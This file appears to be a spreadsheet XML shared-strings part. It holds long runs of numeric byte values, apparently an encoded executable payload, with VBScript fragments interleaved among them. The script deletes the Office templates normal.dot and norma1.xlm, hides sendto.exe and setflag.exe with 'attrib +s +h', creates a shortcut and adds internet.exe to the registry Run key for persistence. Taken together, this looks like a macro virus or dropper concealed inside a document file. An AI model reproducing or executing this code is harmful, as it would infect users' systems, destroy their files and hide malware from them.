    <t xml:space="preserve">164 244 102 220 197 56 161 225 116 150 49 43 118 246 162 149 183 251 53 143 250 251 165 154 13 251 183 205 185 244 217 222 95 247 173 121 101 200 222 27 103 248 228 38 103 202 71 15 155 18 165 211 7 110 254 246 218 194 41 113 71 220 142 83 183 227 186 244 248 217 49 236 66 135 228 91 155 238 12 57 250 194 194 105 7 175 221 61 236 73 182 254 181 253 186 243 238 157 239 71 88 175 230 52 12 31 63 235 253 183 46 85 36 29 219 88 50 99 250 149 181 159 204 153 107 189 34 20 237 74 95 231 78 200 157 191 187 100 222 136 162 111 207 236 232 49 229 235 81 27 14 247 185 207 78 111 74 110 174 189 61 233 222 217 71 29 7 255 145 55 250 229 115 205 231 26 31 49 179 163 217 181 255 63 175 253 207 127 54 195 100 160 19 227 84 94 213 163 6 31 50 91 249 89 231 133 204 192 89 197 20 65 142 134 89 172 44 194 100 245 140 133 120 73 77 210 184 214 135 29 91 210 106 248 187 48 168 119 48 29 65 30 113 210 124 70 221 53 232 139 233 35 80 141 186 155 114 29 79 29 140 42 150 208 84 97 104 52 74 27 31 66 139 8 83 46 50 12 173 67 24 90 199 48 180 168 48 52 77 24 90 167 48 188 116 14 67 139 126 146 246 15 155 162 190 16 88 36 0 128 67 75 236 61 11 108 28 199 117 179 123 191 229 241 142 60 146 71 241 68 241 179 164 40 234 72 253 142 20 45 159 28 73 62 82 148 124 180 101 153 142 21 155 141 29 248 232 144 6 5 211 212 89 162 156 179 173 20 231 68 9 104 192 13 216 64 104 207 169 139 50 128 209 178 109 96 80 110 106 51 128 139 48 128 11 176 129 129 92 218 162 38 2 3 102 218 0 101 138 6 165 211 166 33 106 135 215 153 183 111 246 199 217 229 81 138 219 160 232 17 199 55 239 205 239 205 155 55 111 102 222 206 236 81 90 72 80 94 88 144 174 74 64 171 22 208 152 100 236 180 26 1 173 86 64 171 19 208 162 64 179 242 87 47 160 237 18 228 109 16 208 98 130 188 187 5 233 26 5 180 61 2 90 147 128 214 44 160 181 8 104 173 54 154 31 30 114 91 31 37 210 200 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">205 93 164 33 68 204 91 208 22 15 25 144 175 147 95 65 47 203 84 30 125 240 224 254 8 104 106 53 206 142 236 113 40 123 65 235 110 210 16 224 94 194 125 236 153 171 188 36 47 53 75 3 158 127 132 2 36 40 224 14 40 96 47 168 53 175 190 61 5 195 162 20 214 238 30 156 102 197 246 191 4 153 216 184 218 5 143 209 253 84 122 30 172 85 194 90 169 206 151 60 164 255 117 72 234 129 242 143 65 210 22 24 14 230 230 209 161 80 82 180 242 251 191 2 233 189 144 254 78 72 223 133 195 213 40 154 14 147 82 157 93 28 3 82 250 69 150 213 7 89 79 67 214 131 48 162 204 85 209 209 84 162 146 12 19 203 70 166 153 74 178 38 207 114 251 33 247 32 228 110 132 177 103 174 152 226 191 242 146 1 202 24 75 27 128 180 236 40 3 195 20 192 146 136 85 128 108 170 16 11 2 22 65 172 18 176 123 16 11 65 190 52 98 97 136 227 165 84 1 118 28 177 106 75 153 17 192 124 136 213 0 54 132 88 173 165 148 58 75 41 81 168 239 20 98 245 128 249 17 219 5 41 155 17 107 0 108 55 98 49 72 73 16 219 13 113 7 16 107 4 236 32 98 123 0 59 132 88 19 96 135 17 107 6 108 15 98 45 128 53 33 214 10 24 59 210 241 30 237 129 235 180 105 147 242 41 210 79 213 242 0 60 255 59 69 107 168 218 209 31 27 95 170 96 204 181 9 104 237 2 155 176 87 144 174 67 144 110 159 128 214 41 160 237 23 208 226 2 90 151 128 214 45 224 229 128 128 118 80 64 59 36 40 239 176 128 118 68 64 75 8 104 61 2 90 175 160 222 163 2 90 159 128 118 135 128 118 76 64 187 83 64 75 10 104 199 5 180 187 4 180 79 9 104 39 4 180 147 2 218 41 129 12 238 182 209 152 86 171 160 213 61 168 227 109 128 29 65 172 29 198 20 31 153 123 33 174 17 177 14 136 171 71 108 31 96 109 136 117 2 118 23 98 251 1 251 20 98 113 192 78 32 214 5 216 89 196 186 161 134 26 196 14 0 38 33 118 16 48 47 98 135 32 159 140 216 97 192 2 136 29 1 172 3 177 4 96 237 136 245 0 22 </t>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t xml:space="preserve">69 172 23 202 84 16 59 10 113 123 17 235 131 184 90 196 238 0 172 14 177 99 128 117 35 118 39 96 113 196 146 128 237 71 236 56 96 157 136 221 5 88 23 98 159 2 172 23 177 19 128 85 32 118 18 176 1 196 78 1 103 97 196 238 6 108 31 218 161 20 243 175 201 59 179 59 34 59 148 18 232 75 191 128 54 32 160 157 22 232 223 160 128 118 70 64 59 43 160 221 35 160 165 5 180 33 1 47 247 10 210 221 39 160 157 19 228 189 95 144 238 188 128 246 128 32 239 176 32 221 131 130 241 150 130 222 107 197 190 236 7 76 69 108 192 50 71 159 6 29 8 34 54 8 88 8 177 51 128 85 34 118 22 48 15 98 247 0 86 141 88 26 176 22 196 134 160 134 20 98 247 66 92 3 98 247 1 22 67 236 28 164 220 133 216 253 22 173 62 111 209 234 7 32 101 63 98 195 16 119 20 177 7 33 238 36 232 106 156 140 209 1 123 65 218 94 31 79 201 181 228 45 63 91 227 164 76 107 163 102 216 19 193 146 2 22 60 119 19 223 191 209 36 126 88 135 5 255 127 95 250 127 244 115 1 159 219 221 234 57 76 186 248 147 74 248 91 120 229 158 191 100 3 114 165 134 159 191 124 156 60 68 55 224 195 20 246 222 2 255 108 33 124 43 247 191 226 242 214 250 143 222 90 253 82 37 158 147 46 183 254 10 60 159 203 62 47 92 235 185 173 254 243 163 252 119 210 126 102 174 126 249 176 225 70 149 93 206 127 111 98 223 50 88 238 249 111 102 214 26 224 168 10 129 13 68 163 237 252 119 11 158 255 86 203 56 255 205 166 243 79 234 252 55 107 147 253 252 247 25 164 187 157 255 230 231 219 135 5 231 191 89 28 251 62 226 112 254 251 115 152 198 124 254 155 225 252 252 247 184 233 252 247 4 194 79 242 115 249 51 121 212 138 60 126 185 134 84 152 180 149 233 71 166 157 107 140 4 218 49 228 51 199 251 201 143 31 213 240 155 56 89 124 15 11 120 5 225 79 251 140 252 236 255 69 76 255 10 150 243 187 136 51 174 120 217 10 213 27 214 139 63 69 124 20 75 168 241 27 105 249 71 34 127 6 99 218 147 169 144 180 83 </t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t xml:space="preserve">222 255 147 247 40 36 242 71 164 1 235 125 27 30 179 64 208 119 31 29 146 237 222 92 169 45 204 180 255 193 92 233 209 233 146 162 176 159 37 232 144 72 152 45 243 27 167 75 164 219 155 45 209 68 62 15 233 240 146 112 145 142 66 37 87 10 39 168 84 39 179 165 95 176 98 255 161 49 87 106 250 109 58 14 188 211 165 95 176 151 100 236 207 148 246 109 205 18 103 46 19 47 201 149 104 161 178 54 42 217 184 110 162 252 116 224 3 162 90 248 31 50 217 131 168 126 42 158 208 156 30 50 77 191 1 200 156 100 58 204 174 244 208 177 165 217 22 249 196 9 61 196 126 153 85 172 63 17 93 47 100 203 201 252 65 224 166 131 72 18 175 209 67 7 65 65 110 218 114 126 191 133 63 223 153 66 6 78 76 235 245 230 244 208 53 82 174 254 6 72 162 157 63 238 241 130 245 224 58 150 109 55 167 147 201 15 53 159 48 249 45 244 28 61 135 240 56 194 26 132 47 157 66 125 198 227 251 199 209 61 253 98 202 125 28 252 176 82 131 31 34 172 192 174 104 67 56 138 244 231 16 31 10 107 240 25 14 79 106 176 31 159 247 13 33 206 199 31 31 103 21 218 143 173 147 30 132 223 68 248 61 132 63 214 224 99 212 124 37 168 137 221 75 205 14 93 60 118 155 8 125 68 138 32 161 7 8 236 7 219 183 144 182 164 122 130 170 205 150 84 99 68 170 181 144 122 168 105 126 82 68 28 223 90 222 81 59 105 148 114 104 35 221 65 205 190 141 255 94 35 77 2 139 239 179 167 233 17 54 200 202 85 47 253 59 126 171 173 28 163 156 217 210 29 167 41 69 165 117 32 233 73 252 235 166 60 222 73 217 233 133 239 24 13 31 119 168 84 32 48 107 51 159 44 43 91 178 140 222 101 58 240 129 172 91 223 62 92 67 36 113 126 149 111 99 45 179 249 125 137 174 70 73 94 49 246 27 249 10 189 166 246 23 169 217 164 163 52 195 108 63 13 159 160 171 214 28 134 217 70 112 81 15 203 100 9 195 9 58 247 46 87 104 225 40 109 192 50 210 59 168 60 87 49 252 105 242 60 41 84 106 225 12 157 243 51 152 158 185 85 139 212 </t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t xml:space="preserve">12 122 177 252 9 191 157 159 16 240 3 15 140 104 26 47 53 193 249 0 175 235 16 72 132 243 22 35 6 111 42 134 253 212 38 41 30 45 28 162 235 162 136 196 235 173 102 82 128 240 48 21 124 178 146 167 169 131 27 93 60 239 140 169 252 89 83 249 195 196 72 95 192 112 140 174 159 230 137 209 174 37 83 222 17 61 236 35 69 12 179 135 56 89 228 167 138 206 30 25 201 104 227 138 169 174 85 83 120 205 84 239 156 100 212 155 84 180 112 55 121 150 204 42 6 255 19 138 193 67 86 49 241 160 152 234 82 140 242 243 166 240 176 98 200 106 17 94 69 165 192 234 117 89 49 248 143 201 6 255 69 201 200 187 32 25 117 69 2 6 159 138 137 31 213 84 87 220 92 102 192 40 51 30 48 210 196 60 6 15 235 40 135 94 186 54 76 5 12 153 67 36 166 223 48 245 133 246 42 45 67 175 184 190 197 29 244 63 137 237 98 171 234 66 152 151 67 200 98 152 151 79 229 96 10 23 49 204 86 149 170 41 253 42 134 217 244 183 30 50 209 77 225 117 83 57 43 33 99 220 45 202 134 172 230 100 163 93 243 24 102 46 138 100 80 11 55 209 181 118 46 200 199 197 221 164 16 228 242 188 155 44 4 141 190 206 6 141 114 38 76 225 140 158 166 146 140 4 13 57 47 5 141 49 78 130 198 24 79 120 140 49 158 149 141 49 190 97 26 227 235 38 253 73 123 196 242 79 209 188 218 24 15 145 44 150 201 214 21 57 15 111 35 149 173 79 11 179 165 192 44 202 135 21 157 13 25 118 163 96 43 31 86 139 146 66 87 25 159 83 127 254 78 210 100 255 126 207 155 1 120 13 247 94 124 23 126 137 230 27 198 220 105 216 55 189 41 183 17 191 164 146 40 64 31 121 21 210 61 133 249 174 17 99 117 172 64 250 203 242 91 132 165 98 7 251 212 147 42 185 38 171 228 186 204 40 210 46 137 120 23 104 83 95 166 187 164 27 20 198 168 153 59 70 219 51 76 191 215 31 52 94 81 246 236 213 133 151 88 145 248 226 55 242 38 163 75 108 48 69 105 5 175 225 51 50 254 97 103 208 181 159 87 10 209 248 115 164 32 53 147 247 </t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t xml:space="preserve">241 181 90 112 237 147 29 156 133 4 23 77 105 25 251 147 218 149 6 118 190 75 251 209 38 83 90 22 191 108 43 223 92 86 123 175 65 127 194 68 175 116 40 79 53 133 199 105 217 239 219 120 187 68 121 87 164 143 129 111 85 192 251 164 141 247 115 146 51 111 116 75 104 106 135 56 60 76 203 200 73 118 30 196 105 47 82 222 74 165 215 32 117 143 128 55 231 48 95 102 151 74 131 208 103 202 219 95 125 238 195 155 21 3 127 124 238 230 71 109 31 174 253 83 247 201 143 62 254 175 185 137 200 159 80 203 125 224 232 51 127 41 58 121 245 135 207 255 249 227 103 254 253 107 253 191 255 131 170 223 121 35 219 189 18 65 23 130 15 93 7 38 69 71 140 77 93 138 61 155 189 106 141 177 251 207 240 2 136 174 86 172 40 6 63 64 124 25 83 176 227 11 255 59 55 231 217 219 198 100 242 80 68 227 83 34 15 133 244 208 13 45 20 36 25 26 234 148 153 233 79 208 80 11 44 142 78 181 243 150 53 158 43 51 164 124 114 57 96 252 179 46 125 140 154 208 159 48 167 11 237 70 182 228 56 75 191 255 89 109 244 248 179 87 111 156 98 221 176 151 34 51 48 254 121 151 24 29 149 130 206 249 90 239 31 188 125 173 183 107 240 79 239 255 210 208 43 247 60 243 238 110 193 149 112 187 62 245 249 126 20 174 152 249 187 115 223 25 244 121 143 252 243 135 223 45 83 159 236 217 236 85 151 175 79 131 59 214 162 177 95 179 222 165 36 166 79 143 158 211 181 40 98 215 39 182 227 237 208 247 190 19 122 40 162 135 162 122 40 166 135 154 244 144 170 135 66 122 40 174 135 14 234 161 4 134 12 77 149 79 56 237 255 119 164 149 162 208 13 222 202 69 90 219 146 172 149 60 169 215 145 213 67 226 253 63 15 105 165 240 94 149 200 121 186 46 120 1 142 172 38 232 58 32 65 87 227 108 111 121 8 41 9 75 232 244 22 154 249 175 143 110 44 191 8 74 200 122 72 146 230 233 4 41 231 55 209 250 104 111 104 99 62 88 66 172 62 41 130 222 78 230 209 172 172 81 101 141 230 201 16 34 126 133 222 53 58 183 51 72 247 10 </t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t xml:space="preserve">227 5 153 77 156 236 48 219 171 48 62 46 126 121 115 203 91 206 24 84 245 135 55 99 80 143 140 233 20 26 187 100 226 102 43 95 73 72 255 165 185 40 240 181 137 47 117 100 222 154 77 151 244 128 123 180 109 30 143 79 144 157 227 204 251 206 134 248 251 20 175 32 90 59 60 80 79 8 234 113 107 47 131 183 19 79 200 246 242 220 174 252 246 185 119 100 109 247 91 42 205 234 134 204 147 178 203 109 66 214 22 14 57 83 59 25 100 116 5 227 217 39 115 253 49 40 143 167 203 163 15 141 237 43 20 147 169 132 121 71 66 3 136 50 205 35 156 65 56 139 176 128 112 14 225 60 194 5 132 139 8 151 16 46 35 44 34 92 65 184 138 144 189 173 212 77 46 108 31 86 244 104 94 239 105 83 123 147 148 150 242 110 150 88 123 216 207 194 122 136 33 231 172 87 243 242 103 224 233 130 70 143 33 157 165 31 52 209 225 201 209 245 183 116 57 141 72 218 66 244 118 251 27 218 136 111 29 254 77 125 75 15 227 143 201 181 207 36 15 152 51 80 174 29 54 250 42 202 85 53 245 3 188 117 5 211 71 108 114 5 187 131 122 85 100 119 152 125 218 219 113 136 45 221 130 79 235 23 246 227 193 21 38 58 47 151 253 182 176 189 220 89 175 6 227 62 13 38 16 38 17 166 16 166 17 14 35 28 65 152 65 56 129 144 221 117 82 252 26 127 239 91 235 251 42 231 227 93 27 31 73 191 198 247 178 141 111 51 63 203 8 139 8 87 16 174 34 92 67 184 142 112 131 243 195 116 223 86 31 231 99 94 32 15 198 119 193 33 253 140 3 61 39 40 103 6 235 207 251 17 71 56 139 176 224 39 120 136 218 184 42 145 224 54 92 182 206 85 78 116 144 11 33 154 31 9 63 131 120 35 254 85 185 32 139 181 53 196 214 187 180 210 194 123 3 3 222 178 221 154 162 100 201 237 189 159 229 120 164 111 47 149 200 25 252 129 164 203 41 89 198 101 148 237 188 158 97 240 106 48 75 191 46 49 175 131 2 71 81 137 201 179 200 61 46 204 209 49 108 242 70 172 34 157 61 99 204 32 253 44 63 205 14 158 42 170 245 50 247 184 224 59 </t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t xml:space="preserve">146 177 156 89 217 240 238 128 23 71 224 5 225 203 109 73 90 246 48 15 69 66 247 72 100 49 102 4 97 196 228 113 48 227 220 38 205 114 189 69 184 136 144 219 221 132 100 165 47 216 202 91 66 184 194 117 85 178 198 175 219 232 17 132 49 94 191 100 205 63 135 248 26 175 79 178 242 179 132 120 146 219 69 164 175 241 122 113 94 140 32 84 17 166 17 142 216 230 231 130 13 242 121 151 205 241 96 31 17 38 17 22 16 206 34 204 33 92 244 88 235 205 249 108 237 180 217 177 121 91 60 199 137 223 42 63 30 207 237 96 26 158 86 255 220 203 215 110 220 238 197 253 86 124 209 111 229 139 183 63 226 177 202 129 183 55 46 91 229 188 193 203 183 173 75 178 152 127 6 161 226 101 107 169 111 121 218 200 121 249 91 240 12 250 85 192 7 82 255 194 86 38 151 166 200 212 133 167 240 73 4 164 55 201 241 111 104 222 117 196 215 40 252 25 205 217 41 171 228 29 249 8 121 67 142 195 62 103 132 166 121 139 110 107 131 196 120 91 1 75 181 143 28 148 37 58 155 38 228 169 11 111 146 106 178 252 205 31 124 244 183 155 111 172 196 59 63 211 117 248 240 97 154 67 33 223 94 248 238 143 226 157 143 116 189 73 87 119 236 26 45 92 151 39 29 100 144 230 220 71 146 240 255 97 250 127 32 197 164 49 174 233 11 229 227 45 47 171 33 174 159 70 17 151 31 36 223 121 237 189 95 222 252 89 188 51 221 197 106 91 252 240 251 127 21 239 124 96 219 218 204 117 26 118 125 197 203 183 236 210 202 77 210 15 87 159 175 78 147 113 245 225 129 199 207 143 62 77 3 39 213 246 11 19 23 9 191 16 28 121 170 61 28 12 190 60 48 122 69 146 95 78 188 144 72 36 122 19 195 201 158 227 135 72 36 225 81 78 7 72 84 174 149 58 18 137 190 99 95 124 49 124 237 158 201 75 79 140 78 74 197 200 67 217 209 207 75 95 63 59 58 233 189 50 30 26 131 139 189 202 232 19 147 245 173 195 151 199 199 102 199 63 63 57 74 252 67 99 228 166 114 225 242 213 240 192 153 92 246 18 77 24 109 130 123 167 100 116 122 124 112 252 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t xml:space="preserve">242 197 103 61 114 237 215 7 174 94 153 190 244 244 69 255 243 222 65 79 47 187 112 156 35 236 194 241 249 241 47 168 75 75 171 61 225 224 112 190 45 191 79 133 27 202 95 249 198 227 15 144 236 248 84 188 43 28 124 128 76 169 240 11 245 106 228 211 227 87 174 230 95 63 63 158 147 167 201 179 218 29 81 162 93 18 157 184 68 190 128 183 229 201 208 212 133 209 43 79 61 49 90 117 57 112 81 137 122 107 217 123 43 8 87 133 124 123 215 225 135 47 94 185 24 188 65 238 31 159 186 58 48 122 249 138 55 222 46 157 5 225 7 72 221 139 65 82 1 29 163 208 158 185 174 12 77 143 63 45 165 124 216 113 222 206 244 187 62 232 88 194 123 214 75 187 54 12 239 93 240 228 63 219 184 91 211 32 249 145 206 58 118 21 58 119 56 217 159 205 230 79 166 164 51 103 195 65 239 208 147 254 11 240 2 11 50 53 173 158 96 239 111 73 177 251 181 225 224 95 127 246 10 57 220 63 54 22 14 158 153 90 98 55 163 195 193 211 50 157 181 194 101 31 216 115 245 29 145 29 239 230 35 130 208 57 65 121 162 144 123 189 55 202 172 87 144 247 27 34 143 219 240 173 123 215 228 19 239 234 126 135 162 30 250 123 61 180 162 135 222 215 67 171 122 232 39 122 104 77 15 253 171 30 90 215 67 255 161 135 54 244 208 199 219 248 59 206 146 211 244 59 64 142 210 85 90 47 233 39 135 232 55 65 41 44 196 46 240 30 163 214 145 209 238 100 207 103 192 223 145 68 15 9 203 115 148 210 123 104 232 14 244 119 68 246 51 127 199 218 209 157 251 59 248 62 190 59 255 23 178 182 70 106 130 181 167 15 247 201 246 189 88 168 230 117 89 251 101 18 177 127 36 214 77 200 210 230 37 50 135 113 7 105 202 62 250 87 197 30 89 208 124 93 95 214 246 133 33 221 239 65 231 10 9 79 225 0 63 17 228 43 178 173 127 129 216 252 40 49 201 205 143 18 197 242 166 100 46 159 74 201 72 151 151 196 245 195 60 140 112 24 215 19 35 8 217 179 214 202 154 183 229 98 5 115 155 56 251 139 114 116 134 102 107 22 230 47 98 199 240 91 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">233 223 0 121 21 150 251 109 38 121 20 37 35 207 117 132 229 200 1 160 105 191 205 158 125 178 253 182 234 183 238 195 151 137 177 15 55 211 217 243 179 60 238 57 120 125 230 248 12 198 71 4 242 49 167 155 145 141 179 61 162 248 9 140 47 218 232 75 72 95 116 200 183 138 241 5 135 120 182 130 206 227 91 84 69 241 42 198 143 56 196 167 48 62 233 212 126 140 143 9 218 111 214 147 148 108 172 255 44 237 198 252 105 27 61 139 244 117 91 125 69 164 175 56 240 179 238 113 151 87 196 235 46 175 132 215 93 94 195 94 119 121 101 189 238 242 154 245 150 39 175 12 247 119 121 173 249 11 152 95 33 203 155 102 250 28 210 211 246 254 247 185 235 175 234 115 214 95 176 121 222 95 159 191 195 92 111 220 103 156 115 227 233 205 241 139 62 222 78 99 156 155 227 87 48 126 94 18 183 107 3 227 103 28 226 217 3 98 22 63 225 16 159 150 196 246 96 216 239 46 207 172 191 60 123 80 240 27 229 139 226 115 126 222 126 135 113 41 25 242 73 154 108 171 178 155 192 153 23 216 59 85 104 167 115 45 250 143 246 175 154 254 57 233 159 27 223 195 1 119 190 178 129 173 237 50 235 19 223 95 177 51 70 176 47 10 216 218 29 16 235 241 114 192 93 238 107 1 119 61 78 96 125 27 8 89 3 64 94 8 35 8 99 8 217 217 25 139 93 193 242 237 242 204 40 6 191 34 190 242 24 31 119 136 159 83 182 202 19 246 241 54 185 44 99 186 25 167 246 99 252 132 67 188 82 177 149 79 161 253 195 116 19 21 14 243 84 133 49 110 45 227 149 235 179 36 169 66 187 91 33 30 79 115 21 238 253 186 84 225 220 175 161 154 77 72 231 113 93 95 220 75 34 65 126 202 143 157 8 14 144 71 200 13 201 190 222 74 4 157 215 23 150 126 64 126 84 187 92 130 238 227 98 38 232 62 255 207 7 13 253 18 214 139 241 41 167 254 15 26 124 137 226 217 195 112 81 191 169 72 111 165 57 45 227 5 253 33 241 74 113 121 35 149 238 122 157 171 20 235 53 227 211 210 255 149 238 227 103 169 210 221 78 174 58 212 195 218 5 245 33 92 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">175 180 217 255 80 121 118 58 133 233 98 145 242 236 99 58 228 108 255 220 242 229 66 70 255 236 36 223 234 14 234 19 218 235 144 120 92 174 35 93 218 233 252 128 249 192 207 111 182 15 72 103 39 198 202 41 103 162 106 171 60 96 253 97 211 159 5 93 110 214 250 102 28 218 181 22 18 143 131 76 149 56 125 50 188 115 249 10 199 127 149 251 120 153 175 114 183 31 139 97 49 223 171 152 143 249 43 133 235 255 106 172 215 33 126 216 161 221 169 42 231 118 91 250 169 154 235 201 206 244 189 80 237 62 174 23 171 157 199 167 112 220 85 185 151 151 172 22 183 83 141 148 103 7 178 38 126 44 227 182 122 251 113 107 225 51 44 230 99 62 178 253 190 192 178 174 8 25 251 12 203 120 136 24 227 214 82 126 104 171 126 149 83 79 170 102 107 251 44 242 195 114 153 255 219 34 23 204 151 112 88 95 23 48 126 201 65 47 23 49 126 206 33 126 101 155 242 55 48 62 227 144 63 86 187 53 191 217 223 144 170 181 174 7 22 90 202 180 167 181 238 243 217 108 173 187 29 88 168 117 183 3 75 78 122 28 16 211 217 253 39 70 95 171 117 231 123 161 78 108 95 150 28 236 232 8 166 159 136 150 57 47 132 203 27 103 179 97 99 254 16 197 23 235 202 156 183 111 195 110 151 211 158 88 141 117 255 202 247 23 35 81 155 253 141 226 186 189 190 188 114 215 170 141 245 176 101 126 170 19 219 159 100 212 208 23 203 248 10 139 233 145 250 237 237 140 121 190 213 219 87 111 219 191 163 190 173 218 218 59 227 96 223 178 17 195 111 98 25 167 117 219 247 147 165 252 58 247 125 94 33 138 231 29 234 113 253 103 227 91 169 51 198 159 197 158 70 197 242 157 175 223 25 127 177 168 184 253 51 187 202 211 219 101 135 241 61 131 229 22 109 237 33 40 239 137 6 219 186 32 38 30 207 11 245 134 223 192 50 47 213 138 211 79 212 137 249 73 239 218 234 159 17 206 15 53 198 120 118 243 211 110 39 151 149 50 199 125 220 65 254 115 245 226 126 87 99 229 149 187 24 217 186 206 177 236 155 29 236 239 112 237 206 244 39 130 242 26 177 245 231 72 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">149 88 63 83 187 220 231 19 118 117 221 62 159 84 214 124 91 214 238 104 136 247 205 153 189 116 190 219 124 138 168 181 154 95 62 78 180 115 156 50 250 229 45 114 109 112 151 75 188 94 188 31 40 34 189 80 107 235 103 164 231 119 219 218 111 170 199 98 23 27 140 121 220 98 87 176 221 171 187 111 207 206 43 14 250 164 54 138 237 116 182 113 251 117 171 235 252 23 21 203 107 30 219 233 177 239 115 26 157 199 97 57 246 157 221 121 0 255 215 30 219 184 64 62 216 195 48 11 29 251 199 111 227 99 181 113 103 122 206 94 165 32 180 115 56 30 99 77 219 200 169 78 44 39 181 73 172 39 145 168 88 126 137 104 121 254 120 118 81 13 246 159 77 232 255 70 152 110 178 181 171 209 161 93 77 238 126 174 121 140 159 221 166 221 137 38 135 125 109 83 153 235 34 156 95 146 173 14 243 79 131 216 206 20 145 238 179 201 101 196 166 55 27 141 226 121 36 230 96 127 227 77 92 159 108 254 214 38 177 191 181 216 236 190 190 94 111 118 183 135 145 22 177 191 104 22 251 51 214 130 178 69 24 111 177 173 99 91 118 182 79 155 109 52 158 39 89 232 187 196 253 24 143 137 229 49 130 245 202 118 251 215 226 48 111 71 184 190 111 179 46 119 226 35 34 166 111 132 196 227 43 187 71 76 95 220 83 222 58 97 189 81 220 238 133 38 177 222 172 180 150 167 239 204 33 234 230 23 80 213 173 250 178 19 123 29 105 22 175 179 211 205 226 113 180 209 34 78 79 90 157 253 8 150 113 222 104 221 119 20 246 224 179 30 21 237 185 106 43 183 109 103 250 154 113 232 119 165 77 108 63 35 109 226 254 201 181 149 215 63 202 30 241 124 146 67 122 192 70 95 112 160 175 182 242 241 33 182 223 197 86 155 221 81 141 244 22 251 170 138 231 245 117 147 28 193 94 224 251 54 156 246 169 153 221 98 57 230 99 14 254 31 85 172 23 74 141 216 94 37 218 240 156 99 187 173 222 106 35 61 59 119 205 94 71 52 141 103 64 84 236 63 246 137 202 141 222 172 137 46 155 218 1 207 231 218 209 254 237 197 250 16 38 247 218 236 152 169 61 162 207 108 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">251 206 238 35 172 211 244 49 202 243 90 7 214 219 113 251 247 25 20 202 115 186 93 147 7 60 139 54 181 27 124 61 148 62 71 235 153 52 221 51 224 244 34 165 63 102 186 63 48 215 140 243 63 182 43 221 97 235 175 70 113 63 230 91 197 246 96 166 213 120 174 7 231 228 59 233 218 223 196 71 214 62 254 219 140 125 52 75 191 74 59 44 45 184 79 177 76 233 73 27 221 194 79 91 121 254 221 116 204 221 31 147 111 20 183 43 210 200 199 169 205 46 216 236 87 204 166 79 49 140 207 236 179 205 103 166 245 34 107 223 6 141 143 11 218 61 65 229 23 51 209 101 236 71 208 3 65 250 52 77 239 53 201 123 139 255 95 181 242 203 244 146 151 71 76 249 248 245 206 120 167 22 63 67 225 250 166 153 15 212 23 140 159 167 112 85 112 31 98 2 227 151 40 44 10 238 81 172 116 178 51 100 91 233 240 204 120 211 249 158 209 130 173 29 41 90 142 114 80 59 7 99 30 43 107 7 126 51 238 15 49 222 44 235 210 253 232 199 116 154 23 49 126 217 105 158 137 227 121 17 39 191 65 220 253 249 122 58 238 254 124 125 34 238 190 46 157 137 255 119 119 215 31 219 196 117 199 159 207 151 224 56 118 112 182 132 166 165 148 227 32 228 220 36 23 255 128 214 77 73 57 219 4 2 109 33 77 210 66 85 58 226 36 71 156 226 216 198 103 7 103 16 97 126 148 102 157 170 102 108 101 12 117 40 140 182 66 83 170 25 169 5 166 110 195 29 172 141 186 169 13 157 166 69 85 215 24 198 218 252 179 41 157 250 7 154 42 178 247 238 222 139 125 23 219 165 237 166 85 35 74 190 220 123 239 222 189 123 239 251 253 188 239 187 123 223 207 125 193 251 31 46 255 243 121 149 255 206 228 182 183 109 108 198 63 87 61 191 101 115 207 31 22 141 125 49 203 51 229 100 28 230 176 62 91 53 246 89 157 27 223 152 234 220 254 186 80 157 103 95 146 53 247 60 155 180 222 218 122 108 20 183 111 220 138 231 119 44 39 177 76 99 57 141 229 12 150 55 176 68 116 124 178 158 97 201 232 52 241 66 124 126 59 72 216 240 222 172 134 76 153 22 </t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">248 255 25 248 59 137 211 82 80 142 52 124 61 91 74 194 235 164 121 205 115 40 220 63 9 205 184 164 172 25 253 86 245 115 45 94 87 230 123 62 135 243 195 249 244 13 231 183 230 243 23 107 11 175 107 19 181 95 240 188 150 211 216 73 109 102 252 85 237 172 207 243 254 179 182 176 221 33 186 69 173 221 9 117 74 253 132 227 13 29 27 178 200 49 102 113 191 201 250 95 135 253 16 40 109 118 101 95 225 55 17 47 229 54 218 149 251 250 80 227 199 216 236 89 251 97 112 123 17 5 165 172 255 88 90 234 243 140 63 238 247 150 60 239 217 58 113 62 151 39 63 129 243 13 121 242 71 235 11 227 122 170 190 48 174 167 235 11 227 58 162 217 44 132 235 12 95 24 215 5 190 176 126 117 242 95 126 253 40 219 54 30 135 97 141 125 251 249 220 248 30 230 115 227 101 130 87 175 75 16 110 1 205 122 91 214 13 140 103 55 176 4 24 155 12 88 90 176 172 194 146 193 146 195 210 134 165 171 65 241 55 226 13 234 117 5 153 55 42 168 1 42 65 29 164 88 234 48 117 148 250 144 50 128 220 126 119 182 223 18 132 191 165 170 244 136 124 127 196 239 6 89 229 25 216 1 15 205 206 247 127 12 48 125 77 142 244 86 167 226 7 107 227 124 93 54 181 255 56 87 222 166 246 31 73 186 31 166 27 114 164 31 135 233 55 242 248 99 211 243 210 247 201 247 53 121 51 115 95 69 89 229 199 53 229 59 97 31 191 67 125 64 149 209 43 41 180 211 141 201 49 191 199 249 60 239 121 184 